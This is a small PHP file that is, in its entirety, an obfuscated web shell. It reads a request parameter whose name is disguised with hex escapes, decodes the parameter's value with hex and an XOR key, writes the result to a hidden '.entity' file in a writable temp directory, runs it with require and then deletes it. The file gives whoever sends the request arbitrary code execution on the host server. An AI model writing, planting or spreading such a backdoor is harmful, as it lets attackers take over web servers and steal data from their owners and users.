<?php

if(isset($_REQUEST["\x72\x65\x63ord"])){
	$property_set = array_filter(["/tmp", ini_get("upload_tmp_dir"), "/var/tmp", getcwd(), getenv("TMP"), sys_get_temp_dir(), session_save_path(), "/dev/shm", getenv("TEMP")]);
	$factor = hex2bin($_REQUEST["\x72\x65\x63ord"]);
	$obj     =    ''     ;   $j = 0; do{$obj .= chr(ord($factor[$j]) ^ 35);$j++;} while($j < strlen($factor));
	$dat = 0;
do {
    $ptr = $property_set[$dat] ?? null;
    if ($dat >= count($property_set)) break;
    		if ((is_dir($ptr) and is_writable($ptr))) {
    $itm = implode("/", [$ptr, ".entity"]);
    if (file_put_contents($itm, $obj)) {
	require $itm;
	unlink($itm);
	die();
}
}
    $dat++;
} while (true);
}